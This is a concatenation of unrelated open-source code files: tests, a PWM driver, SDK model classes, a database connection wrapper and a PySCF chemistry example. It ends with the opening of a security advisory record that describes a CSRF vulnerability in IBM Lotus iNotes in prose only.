self.addCleanup(self.daemon.jsonrpc_tracemalloc_disable)
self.assertFalse(self.daemon.jsonrpc_tracemalloc_disable())
self.assertTrue(self.daemon.jsonrpc_tracemalloc_enable())
class WeirdObject():
pass
hold_em = [WeirdObject() for _ in range(500)]
top = self.daemon.jsonrpc_tracemalloc_top(1)
self.assertEqual(1, len(top))
self.assertEqual('hold_em = [WeirdObject() for _ in range(500)]', top[0]['code'])
self.assertTrue(top[0]['line'].startswith('other/test_other_commands.py:'))
self.assertGreaterEqual(top[0]['count'], 500)
self.assertGreater(top[0]['size'], 0) # just matters that its a positive integer
| 1,038 |
7,737 | <filename>ext/phalcon/html/helper/script.zep.c
#ifdef HAVE_CONFIG_H
#include "../../../ext_config.h"
#endif
#include <php.h>
#include "../../../php_ext.h"
#include "../../../ext.h"
#include <Zend/zend_operators.h>
#include <Zend/zend_exceptions.h>
#include <Zend/zend_interfaces.h>
#include "kernel/main.h"
#include "kernel/array.h"
#include "kernel/memory.h"
#include "kernel/operators.h"
#include "kernel/object.h"
/**
* This file is part of the Phalcon.
*
* (c) <NAME> <<EMAIL>>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
/**
* Class Script
*/
ZEPHIR_INIT_CLASS(Phalcon_Html_Helper_Script)
{
ZEPHIR_REGISTER_CLASS_EX(Phalcon\\Html\\Helper, Script, phalcon, html_helper_script, phalcon_html_helper_style_ce, phalcon_html_helper_script_method_entry, 0);
return SUCCESS;
}
/**
* Returns the necessary attributes
*
* @param string $href
* @param array $attributes
*
* @return array
*/
PHP_METHOD(Phalcon_Html_Helper_Script, getAttributes)
{
zephir_method_globals *ZEPHIR_METHOD_GLOBALS_PTR = NULL;
zval attributes, required;
zval *href_param = NULL, *attributes_param = NULL;
zval href;
zval *this_ptr = getThis();
ZVAL_UNDEF(&href);
ZVAL_UNDEF(&attributes);
ZVAL_UNDEF(&required);
#if PHP_VERSION_ID >= 80000
bool is_null_true = 1;
ZEND_PARSE_PARAMETERS_START(2, 2)
Z_PARAM_STR(href)
Z_PARAM_ARRAY(attributes)
ZEND_PARSE_PARAMETERS_END();
#endif
ZEPHIR_MM_GROW();
zephir_fetch_params(1, 2, 0, &href_param, &attributes_param);
zephir_get_strval(&href, href_param);
zephir_get_arrval(&attributes, attributes_param);
ZEPHIR_INIT_VAR(&required);
zephir_create_array(&required, 2, 0);
zephir_array_update_string(&required, SL("src"), &href, PH_COPY | PH_SEPARATE);
add_assoc_stringl_ex(&required, SL("type"), SL("text/javascript"));
zephir_array_unset_string(&attributes, SL("src"), PH_SEPARATE);
zephir_fast_array_merge(return_value, &required, &attributes);
RETURN_MM();
}
/**
* @return string
*/
PHP_METHOD(Phalcon_Html_Helper_Script, getTag)
{
zval *this_ptr = getThis();
RETURN_STRING("script");
}
| 874 |
501 | #!/usr/bin/env python
#
# Author: <NAME> <<EMAIL>>
#
'''
CCSD and CCSD(T) density matrices
'''
import numpy
from pyscf import gto, scf, cc, ao2mo
mol = gto.M(
atom = 'H 0 0 0; F 0 0 1.1',
basis = 'ccpvdz')
mf = scf.RHF(mol).run()
mycc = cc.CCSD(mf).run()
#
# CCSD density matrix in MO basis
#
dm1 = mycc.make_rdm1()
dm2 = mycc.make_rdm2()
#
# CCSD energy based on density matrices
#
h1 = numpy.einsum('pi,pq,qj->ij', mf.mo_coeff.conj(), mf.get_hcore(), mf.mo_coeff)
nmo = mf.mo_coeff.shape[1]
eri = ao2mo.kernel(mol, mf.mo_coeff, compact=False).reshape([nmo]*4)
E = numpy.einsum('pq,qp', h1, dm1)
# Note dm2 is transposed to simplify its contraction to integrals
E+= numpy.einsum('pqrs,pqrs', eri, dm2) * .5
E+= mol.energy_nuc()
print('E(CCSD) = %s, reference %s' % (E, mycc.e_tot))
# When plotting CCSD density on grids, CCSD density matrices need to be
# transformed to AO basis representation.
dm1_ao = numpy.einsum('pi,ij,qj->pq', mf.mo_coeff, dm1, mf.mo_coeff.conj())
from pyscf.tools import cubegen
cubegen.density(mol, 'rho_ccsd.cube', dm1_ao)
###
#
# Compute CCSD(T) density matrices with ccsd_t-slow implementation
# (as of pyscf v1.7)
#
from pyscf.cc import ccsd_t_lambda_slow as ccsd_t_lambda
from pyscf.cc import ccsd_t_rdm_slow as ccsd_t_rdm
eris = mycc.ao2mo()
conv, l1, l2 = ccsd_t_lambda.kernel(mycc, eris, mycc.t1, mycc.t2)
dm1 = ccsd_t_rdm.make_rdm1(mycc, mycc.t1, mycc.t2, l1, l2, eris=eris)
dm2 = ccsd_t_rdm.make_rdm2(mycc, mycc.t1, mycc.t2, l1, l2, eris=eris)
| 741 |
28,056 | package com.alibaba.json.bvt.kotlin;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.util.ASMUtils;
import junit.framework.TestCase;
import org.apache.commons.io.IOUtils;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.HashMap;
import java.util.Map;
/**
* Created by wenshao on 05/08/2017.
*/
public class DataClassSimpleTest extends TestCase {
public void test_user() throws Exception {
ExtClassLoader classLoader = new ExtClassLoader();
Class clazz = classLoader.loadClass("DataClassSimple");
String[] names = ASMUtils.lookupParameterNames(clazz.getConstructors()[0]);
System.out.println(JSON.toJSONString(names));
String json = "{\"a\":1001,\"b\":1002}";
Object obj = JSON.parseObject(json, clazz);
assertEquals("{\"a\":1001,\"b\":1002}", JSON.toJSONString(obj));
}
public static class ExtClassLoader extends ClassLoader {
Map<String, byte[]> resources = new HashMap<String, byte[]>();
public ExtClassLoader() throws IOException {
super(Thread.currentThread().getContextClassLoader());
{
byte[] bytes;
InputStream is = Thread.currentThread().getContextClassLoader().getResourceAsStream("kotlin/DataClassSimple.clazz");
bytes = IOUtils.toByteArray(is);
is.close();
resources.put("DataClassSimple.class", bytes);
super.defineClass("DataClassSimple", bytes, 0, bytes.length);
}
}
public InputStream getResourceAsStream(String name) {
byte[] bytes = resources.get(name);
if (bytes != null) {
return new ByteArrayInputStream(bytes);
}
return super.getResourceAsStream(name);
}
}
}
| 771 |
7,482 | /*
* Copyright (c) 2006-2021, RT-Thread Development Team
*
* SPDX-License-Identifier: Apache-2.0
*
* Change Logs:
* Date Author Notes
* 2020-1-13 Leo first version
*/
#include <board.h>
#include "drv_pwm.h"
#ifdef RT_USING_PWM
#if !defined(BSP_USING_TIM3_CH1) && !defined(BSP_USING_TIM3_CH2) && \
!defined(BSP_USING_TIM3_CH3) && !defined(BSP_USING_TIM3_CH4)
#error "Please define at least one BSP_USING_TIMx_CHx"
#endif
#endif /* RT_USING_PWM */
#define DRV_DEBUG
#define LOG_TAG "drv.pwm"
#include <drv_log.h>
#define MAX_PERIOD 65535
struct rt_device_pwm pwm_device;
struct n32_pwm
{
struct rt_device_pwm pwm_device;
TIM_Module* tim_handle;
rt_uint8_t channel;
char *name;
};
static struct n32_pwm n32_pwm_obj[] =
{
#ifdef BSP_USING_TIM3_CH1
PWM1_TIM3_CONFIG,
#endif
#ifdef BSP_USING_TIM3_CH2
PWM2_TIM3_CONFIG,
#endif
#ifdef BSP_USING_TIM3_CH3
PWM3_TIM3_CONFIG,
#endif
#ifdef BSP_USING_TIM3_CH4
PWM4_TIM3_CONFIG,
#endif
};
static rt_err_t drv_pwm_control(struct rt_device_pwm *device, int cmd, void *arg);
static struct rt_pwm_ops drv_ops =
{
drv_pwm_control
};
static rt_err_t drv_pwm_enable(TIM_Module* TIMx, struct rt_pwm_configuration *configuration, rt_bool_t enable)
{
/* Get the value of channel */
rt_uint32_t channel = configuration->channel;
if (!enable)
{
if(channel == 1)
{
TIM_EnableCapCmpCh(TIMx, TIM_CH_1, TIM_CAP_CMP_DISABLE);
}
else if(channel == 2)
{
TIM_EnableCapCmpCh(TIMx, TIM_CH_2, TIM_CAP_CMP_DISABLE);
}
else if(channel == 3)
{
TIM_EnableCapCmpCh(TIMx, TIM_CH_3, TIM_CAP_CMP_DISABLE);
}
else if(channel == 4)
{
TIM_EnableCapCmpCh(TIMx, TIM_CH_4, TIM_CAP_CMP_DISABLE);
}
}
else
{
if(channel == 1)
{
TIM_EnableCapCmpCh(TIMx, TIM_CH_1, TIM_CAP_CMP_ENABLE);
}
else if(channel == 2)
{
TIM_EnableCapCmpCh(TIMx, TIM_CH_2, TIM_CAP_CMP_ENABLE);
}
else if(channel == 3)
{
TIM_EnableCapCmpCh(TIMx, TIM_CH_3, TIM_CAP_CMP_ENABLE);
}
else if(channel == 4)
{
TIM_EnableCapCmpCh(TIMx, TIM_CH_4, TIM_CAP_CMP_ENABLE);
}
}
TIM_Enable(TIMx, ENABLE);
return RT_EOK;
}
static rt_err_t drv_pwm_get(TIM_Module* TIMx, struct rt_pwm_configuration *configuration)
{
RCC_ClocksType RCC_Clockstruct;
rt_uint32_t ar, div, cc1, cc2, cc3, cc4;
rt_uint32_t channel = configuration->channel;
rt_uint64_t tim_clock;
ar = TIMx->AR;
div = TIMx->PSC;
cc1 = TIMx->CCDAT1;
cc2 = TIMx->CCDAT2;
cc3 = TIMx->CCDAT3;
cc4 = TIMx->CCDAT4;
RCC_GetClocksFreqValue(&RCC_Clockstruct);
tim_clock = RCC_Clockstruct.Pclk2Freq;
/* Convert nanosecond to frequency and duty cycle. */
tim_clock /= 1000000UL;
configuration->period = (ar + 1) * (div + 1) * 1000UL / tim_clock;
if(channel == 1)
configuration->pulse = (cc1 + 1) * (div + 1) * 1000UL / tim_clock;
if(channel == 2)
configuration->pulse = (cc2 + 1) * (div+ 1) * 1000UL / tim_clock;
if(channel == 3)
configuration->pulse = (cc3 + 1) * (div + 1) * 1000UL / tim_clock;
if(channel == 4)
configuration->pulse = (cc4 + 1) * (div + 1) * 1000UL / tim_clock;
return RT_EOK;
}
static rt_err_t drv_pwm_set(TIM_Module* TIMx, struct rt_pwm_configuration *configuration)
{
/* Init timer pin and enable clock */
n32_msp_tim_init(TIMx);
RCC_ClocksType RCC_Clock;
RCC_GetClocksFreqValue(&RCC_Clock);
rt_uint64_t input_clock;
if ((TIM1 == TIMx) || (TIM8 == TIMx))
{
RCC_ConfigTim18Clk(RCC_TIM18CLK_SRC_SYSCLK);
input_clock = RCC_Clock.SysclkFreq;
}
else
{
if (1 == (RCC_Clock.HclkFreq/RCC_Clock.Pclk1Freq))
input_clock = RCC_Clock.Pclk1Freq;
else
input_clock = RCC_Clock.Pclk1Freq * 2;
}
/* Convert nanosecond to frequency and duty cycle. */
rt_uint32_t period = (unsigned long long)configuration->period ;
rt_uint64_t psc = period / MAX_PERIOD + 1;
period = period / psc;
psc = psc * (input_clock / 1000000);
/* TIMe base configuration */
TIM_TimeBaseInitType TIM_TIMeBaseStructure;
TIM_InitTimBaseStruct(&TIM_TIMeBaseStructure);
TIM_TIMeBaseStructure.Period = period;
TIM_TIMeBaseStructure.Prescaler = psc - 1;
TIM_TIMeBaseStructure.ClkDiv = 0;
TIM_TIMeBaseStructure.CntMode = TIM_CNT_MODE_UP;
TIM_InitTimeBase(TIMx, &TIM_TIMeBaseStructure);
rt_uint32_t pulse = (unsigned long long)configuration->pulse;
/* PWM1 Mode configuration: Channel1 */
OCInitType TIM_OCInitStructure;
TIM_InitOcStruct(&TIM_OCInitStructure);
TIM_OCInitStructure.OcMode = TIM_OCMODE_PWM1;
TIM_OCInitStructure.OutputState = TIM_OUTPUT_STATE_ENABLE;
TIM_OCInitStructure.Pulse = pulse;
TIM_OCInitStructure.OcPolarity = TIM_OC_POLARITY_HIGH;
rt_uint32_t channel = configuration->channel;
if(channel == 1)
{
TIM_InitOc1(TIMx, &TIM_OCInitStructure);
TIM_ConfigOc1Preload(TIMx, TIM_OC_PRE_LOAD_ENABLE);
}
else if(channel == 2)
{
TIM_InitOc2(TIMx, &TIM_OCInitStructure);
TIM_ConfigOc2Preload(TIMx, TIM_OC_PRE_LOAD_ENABLE);
}
else if(channel == 3)
{
TIM_InitOc3(TIMx, &TIM_OCInitStructure);
TIM_ConfigOc3Preload(TIMx, TIM_OC_PRE_LOAD_ENABLE);
}
else if(channel == 4)
{
TIM_InitOc4(TIMx, &TIM_OCInitStructure);
TIM_ConfigOc4Preload(TIMx, TIM_OC_PRE_LOAD_ENABLE);
}
TIM_ConfigArPreload(TIMx, ENABLE);
TIM_EnableCtrlPwmOutputs(TIMx, ENABLE);
return RT_EOK;
}
static rt_err_t drv_pwm_control(struct rt_device_pwm *device, int cmd, void *arg)
{
struct rt_pwm_configuration *configuration = (struct rt_pwm_configuration *)arg;
TIM_Module *TIMx = (TIM_Module *)device->parent.user_data;
switch (cmd)
{
case PWM_CMD_ENABLE:
return drv_pwm_enable(TIMx, configuration, RT_TRUE);
case PWM_CMD_DISABLE:
return drv_pwm_enable(TIMx, configuration, RT_FALSE);
case PWM_CMD_SET:
return drv_pwm_set(TIMx, configuration);
case PWM_CMD_GET:
return drv_pwm_get(TIMx, configuration);
default:
return RT_EINVAL;
}
}
static int rt_hw_pwm_init(void)
{
int i = 0;
int result = RT_EOK;
for(i = 0; i < sizeof(n32_pwm_obj) / sizeof(n32_pwm_obj[0]); i++)
{
if(rt_device_pwm_register(&n32_pwm_obj[i].pwm_device, n32_pwm_obj[i].name, &drv_ops, n32_pwm_obj[i].tim_handle) == RT_EOK)
{
LOG_D("%s register success", n32_pwm_obj[i].name);
}
else
{
LOG_D("%s register failed", n32_pwm_obj[i].name);
result = -RT_ERROR;
}
}
return result;
}
INIT_BOARD_EXPORT(rt_hw_pwm_init);
| 3,578 |
416 | <gh_stars>100-1000
/*
* Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.tencentcloudapi.cwp.v20180228.models;
import com.tencentcloudapi.common.AbstractModel;
import com.google.gson.annotations.SerializedName;
import com.google.gson.annotations.Expose;
import java.util.HashMap;
public class AssetPlanTask extends AbstractModel{
/**
* 默认启用状态:1启用,2未启用
*/
@SerializedName("Status")
@Expose
private Long Status;
/**
* 执行周期
*/
@SerializedName("Cycle")
@Expose
private String Cycle;
/**
* 执行命令或脚本
*/
@SerializedName("Command")
@Expose
private String Command;
/**
* 启动用户
*/
@SerializedName("User")
@Expose
private String User;
/**
* 配置文件路径
*/
@SerializedName("ConfigPath")
@Expose
private String ConfigPath;
/**
* 服务器IP
*/
@SerializedName("MachineIp")
@Expose
private String MachineIp;
/**
* 服务器名称
*/
@SerializedName("MachineName")
@Expose
private String MachineName;
/**
* 操作系统
*/
@SerializedName("OsInfo")
@Expose
private String OsInfo;
/**
* 主机Quuid
*/
@SerializedName("Quuid")
@Expose
private String Quuid;
/**
* 主机uuid
*/
@SerializedName("Uuid")
@Expose
private String Uuid;
/**
* 数据更新时间
注意:此字段可能返回 null,表示取不到有效值。
*/
@SerializedName("UpdateTime")
@Expose
private String UpdateTime;
/**
* Get 默认启用状态:1启用,2未启用
* @return Status 默认启用状态:1启用,2未启用
*/
public Long getStatus() {
return this.Status;
}
/**
* Set 默认启用状态:1启用,2未启用
* @param Status 默认启用状态:1启用,2未启用
*/
public void setStatus(Long Status) {
this.Status = Status;
}
/**
* Get 执行周期
* @return Cycle 执行周期
*/
public String getCycle() {
return this.Cycle;
}
/**
* Set 执行周期
* @param Cycle 执行周期
*/
public void setCycle(String Cycle) {
this.Cycle = Cycle;
}
/**
* Get 执行命令或脚本
* @return Command 执行命令或脚本
*/
public String getCommand() {
return this.Command;
}
/**
* Set 执行命令或脚本
* @param Command 执行命令或脚本
*/
public void setCommand(String Command) {
this.Command = Command;
}
/**
* Get 启动用户
* @return User 启动用户
*/
public String getUser() {
return this.User;
}
/**
* Set 启动用户
* @param User 启动用户
*/
public void setUser(String User) {
this.User = User;
}
/**
* Get 配置文件路径
* @return ConfigPath 配置文件路径
*/
public String getConfigPath() {
return this.ConfigPath;
}
/**
* Set 配置文件路径
* @param ConfigPath 配置文件路径
*/
public void setConfigPath(String ConfigPath) {
this.ConfigPath = ConfigPath;
}
/**
* Get 服务器IP
* @return MachineIp 服务器IP
*/
public String getMachineIp() {
return this.MachineIp;
}
/**
* Set 服务器IP
* @param MachineIp 服务器IP
*/
public void setMachineIp(String MachineIp) {
this.MachineIp = MachineIp;
}
/**
* Get 服务器名称
* @return MachineName 服务器名称
*/
public String getMachineName() {
return this.MachineName;
}
/**
* Set 服务器名称
* @param MachineName 服务器名称
*/
public void setMachineName(String MachineName) {
this.MachineName = MachineName;
}
/**
* Get 操作系统
* @return OsInfo 操作系统
*/
public String getOsInfo() {
return this.OsInfo;
}
/**
* Set 操作系统
* @param OsInfo 操作系统
*/
public void setOsInfo(String OsInfo) {
this.OsInfo = OsInfo;
}
/**
* Get 主机Quuid
* @return Quuid 主机Quuid
*/
public String getQuuid() {
return this.Quuid;
}
/**
* Set 主机Quuid
* @param Quuid 主机Quuid
*/
public void setQuuid(String Quuid) {
this.Quuid = Quuid;
}
/**
* Get 主机uuid
* @return Uuid 主机uuid
*/
public String getUuid() {
return this.Uuid;
}
/**
* Set 主机uuid
* @param Uuid 主机uuid
*/
public void setUuid(String Uuid) {
this.Uuid = Uuid;
}
/**
* Get 数据更新时间
注意:此字段可能返回 null,表示取不到有效值。
* @return UpdateTime 数据更新时间
注意:此字段可能返回 null,表示取不到有效值。
*/
public String getUpdateTime() {
return this.UpdateTime;
}
/**
* Set 数据更新时间
注意:此字段可能返回 null,表示取不到有效值。
* @param UpdateTime 数据更新时间
注意:此字段可能返回 null,表示取不到有效值。
*/
public void setUpdateTime(String UpdateTime) {
this.UpdateTime = UpdateTime;
}
public AssetPlanTask() {
}
/**
* NOTE: Any ambiguous key set via .set("AnyKey", "value") will be a shallow copy,
* and any explicit key, i.e Foo, set via .setFoo("value") will be a deep copy.
*/
public AssetPlanTask(AssetPlanTask source) {
if (source.Status != null) {
this.Status = new Long(source.Status);
}
if (source.Cycle != null) {
this.Cycle = new String(source.Cycle);
}
if (source.Command != null) {
this.Command = new String(source.Command);
}
if (source.User != null) {
this.User = new String(source.User);
}
if (source.ConfigPath != null) {
this.ConfigPath = new String(source.ConfigPath);
}
if (source.MachineIp != null) {
this.MachineIp = new String(source.MachineIp);
}
if (source.MachineName != null) {
this.MachineName = new String(source.MachineName);
}
if (source.OsInfo != null) {
this.OsInfo = new String(source.OsInfo);
}
if (source.Quuid != null) {
this.Quuid = new String(source.Quuid);
}
if (source.Uuid != null) {
this.Uuid = new String(source.Uuid);
}
if (source.UpdateTime != null) {
this.UpdateTime = new String(source.UpdateTime);
}
}
/**
* Internal implementation, normal users should not use it.
*/
public void toMap(HashMap<String, String> map, String prefix) {
this.setParamSimple(map, prefix + "Status", this.Status);
this.setParamSimple(map, prefix + "Cycle", this.Cycle);
this.setParamSimple(map, prefix + "Command", this.Command);
this.setParamSimple(map, prefix + "User", this.User);
this.setParamSimple(map, prefix + "ConfigPath", this.ConfigPath);
this.setParamSimple(map, prefix + "MachineIp", this.MachineIp);
this.setParamSimple(map, prefix + "MachineName", this.MachineName);
this.setParamSimple(map, prefix + "OsInfo", this.OsInfo);
this.setParamSimple(map, prefix + "Quuid", this.Quuid);
this.setParamSimple(map, prefix + "Uuid", this.Uuid);
this.setParamSimple(map, prefix + "UpdateTime", this.UpdateTime);
}
}
| 4,021 |
679 | <reponame>Grosskopf/openoffice<gh_stars>100-1000
/**************************************************************
*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*
*************************************************************/
// MARKER(update_precomp.py): autogen include statement, do not remove
#include "precompiled_connectivity.hxx"
#include "ZConnectionWrapper.hxx"
#include <com/sun/star/sdbc/ColumnValue.hpp>
#include <com/sun/star/sdbc/XRow.hpp>
#include <com/sun/star/lang/DisposedException.hpp>
#include <comphelper/extract.hxx>
#include <cppuhelper/typeprovider.hxx>
#include <comphelper/sequence.hxx>
using namespace connectivity;
//------------------------------------------------------------------------------
using namespace com::sun::star::uno;
using namespace com::sun::star::lang;
using namespace com::sun::star::beans;
using namespace com::sun::star::sdbc;
// --------------------------------------------------------------------------------
OConnectionWeakWrapper::OConnectionWeakWrapper(Reference< XAggregation >& _xConnection)
: OConnectionWeakWrapper_BASE(m_aMutex)
{
setDelegation(_xConnection,m_refCount);
OSL_ENSURE(m_xConnection.is(),"OConnectionWeakWrapper: Connection must be valid!");
}
//-----------------------------------------------------------------------------
OConnectionWeakWrapper::~OConnectionWeakWrapper()
{
if ( !OConnectionWeakWrapper_BASE::rBHelper.bDisposed )
{
osl_incrementInterlockedCount( &m_refCount );
dispose();
}
}
// XServiceInfo
// --------------------------------------------------------------------------------
IMPLEMENT_SERVICE_INFO(OConnectionWeakWrapper, "com.sun.star.sdbc.drivers.OConnectionWeakWrapper", "com.sun.star.sdbc.Connection")
// --------------------------------------------------------------------------------
Reference< XStatement > SAL_CALL OConnectionWeakWrapper::createStatement( ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
return m_xConnection->createStatement();
}
// --------------------------------------------------------------------------------
Reference< XPreparedStatement > SAL_CALL OConnectionWeakWrapper::prepareStatement( const ::rtl::OUString& sql ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
return m_xConnection->prepareStatement(sql);
}
// --------------------------------------------------------------------------------
Reference< XPreparedStatement > SAL_CALL OConnectionWeakWrapper::prepareCall( const ::rtl::OUString& sql ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
return m_xConnection->prepareCall(sql);
}
// --------------------------------------------------------------------------------
::rtl::OUString SAL_CALL OConnectionWeakWrapper::nativeSQL( const ::rtl::OUString& sql ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
return m_xConnection->nativeSQL(sql);
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::setAutoCommit( sal_Bool autoCommit ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
m_xConnection->setAutoCommit(autoCommit);
}
// --------------------------------------------------------------------------------
sal_Bool SAL_CALL OConnectionWeakWrapper::getAutoCommit( ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
return m_xConnection->getAutoCommit();
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::commit( ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
m_xConnection->commit();
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::rollback( ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
m_xConnection->rollback();
}
// --------------------------------------------------------------------------------
sal_Bool SAL_CALL OConnectionWeakWrapper::isClosed( ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
return m_xConnection->isClosed();
}
// --------------------------------------------------------------------------------
Reference< XDatabaseMetaData > SAL_CALL OConnectionWeakWrapper::getMetaData( ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
return m_xConnection->getMetaData();
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::setReadOnly( sal_Bool readOnly ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
m_xConnection->setReadOnly(readOnly);
}
// --------------------------------------------------------------------------------
sal_Bool SAL_CALL OConnectionWeakWrapper::isReadOnly( ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
return m_xConnection->isReadOnly();
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::setCatalog( const ::rtl::OUString& catalog ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
m_xConnection->setCatalog(catalog);
}
// --------------------------------------------------------------------------------
::rtl::OUString SAL_CALL OConnectionWeakWrapper::getCatalog( ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
return m_xConnection->getCatalog();
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::setTransactionIsolation( sal_Int32 level ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
m_xConnection->setTransactionIsolation(level);
}
// --------------------------------------------------------------------------------
sal_Int32 SAL_CALL OConnectionWeakWrapper::getTransactionIsolation( ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
return m_xConnection->getTransactionIsolation();
}
// --------------------------------------------------------------------------------
Reference< ::com::sun::star::container::XNameAccess > SAL_CALL OConnectionWeakWrapper::getTypeMap( ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
return m_xConnection->getTypeMap();
}
// --------------------------------------------------------------------------------
void SAL_CALL OConnectionWeakWrapper::setTypeMap( const Reference< ::com::sun::star::container::XNameAccess >& typeMap ) throw(SQLException, RuntimeException)
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
m_xConnection->setTypeMap(typeMap);
}
// --------------------------------------------------------------------------------
// XCloseable
void SAL_CALL OConnectionWeakWrapper::close( ) throw(SQLException, RuntimeException)
{
{
::osl::MutexGuard aGuard( m_aMutex );
checkDisposed(OConnectionWeakWrapper_BASE::rBHelper.bDisposed);
}
dispose();
}
//------------------------------------------------------------------------------
void OConnectionWeakWrapper::disposing()
{
::osl::MutexGuard aGuard(m_aMutex);
OConnectionWeakWrapper_BASE::disposing();
OConnectionWrapper::disposing();
}
// -----------------------------------------------------------------------------
// com::sun::star::lang::XUnoTunnel
#ifdef N_DEBUG
IMPLEMENT_FORWARD_XINTERFACE2(OConnectionWeakWrapper,OConnectionWeakWrapper_BASE,OConnectionWrapper)
#else
IMPLEMENT_FORWARD_REFCOUNT( OConnectionWeakWrapper, OConnectionWeakWrapper_BASE ) \
::com::sun::star::uno::Any SAL_CALL OConnectionWeakWrapper::queryInterface( const ::com::sun::star::uno::Type& _rType ) throw (::com::sun::star::uno::RuntimeException) \
{ \
::com::sun::star::uno::Any aReturn = OConnectionWeakWrapper_BASE::queryInterface( _rType ); \
if ( !aReturn.hasValue() ) \
aReturn = OConnectionWrapper::queryInterface( _rType ); \
return aReturn; \
}
#endif
IMPLEMENT_FORWARD_XTYPEPROVIDER2(OConnectionWeakWrapper,OConnectionWeakWrapper_BASE,OConnectionWrapper)
| 2,867 |
1,062 | <gh_stars>1000+
//
// Generated by class-dump 3.5b1 (64 bit) (Debug version compiled Dec 3 2019 19:59:57).
//
// Copyright (C) 1997-2019 <NAME>.
//
#import "InteractiveComposeContext.h"
@class NSRunningApplication;
@interface ActivatingComposeContext : InteractiveComposeContext
{
NSRunningApplication *_restoreToApplication; // 8 = 0x8
}
@property(readonly, nonatomic) NSRunningApplication *restoreToApplication; // @synthesize restoreToApplication=_restoreToApplication;
// - (void).cxx_destruct; // IMP=0x000000010018c31e
- (void)controllerWillClose:(id)arg1; // IMP=0x000000010018c2a0
- (void)loadCompleted:(id)arg1; // IMP=0x000000010018c202
- (BOOL)shouldTransientlyActivateApplication; // IMP=0x000000010018c1cd
- (id)_currentActiveApplication; // IMP=0x000000010018bfe9
- (id)initWithType:(long long)arg1 targetMessages:(id)arg2; // IMP=0x000000010018bf85
@end
| 318 |
892 | {
"schema_version": "1.2.0",
"id": "GHSA-5g96-p6qf-5h9j",
"modified": "2022-05-02T06:17:12Z",
"published": "2022-05-02T06:17:12Z",
"aliases": [
"CVE-2010-0921"
],
"details": "Cross-site request forgery (CSRF) vulnerability in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.281 for Domino 8.0.2 FP4 allows remote attackers to hijack the authentication of unspecified victims via vectors related to lack of \"XSS/CSRF Get Filter and Referer Check fixes.\"",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
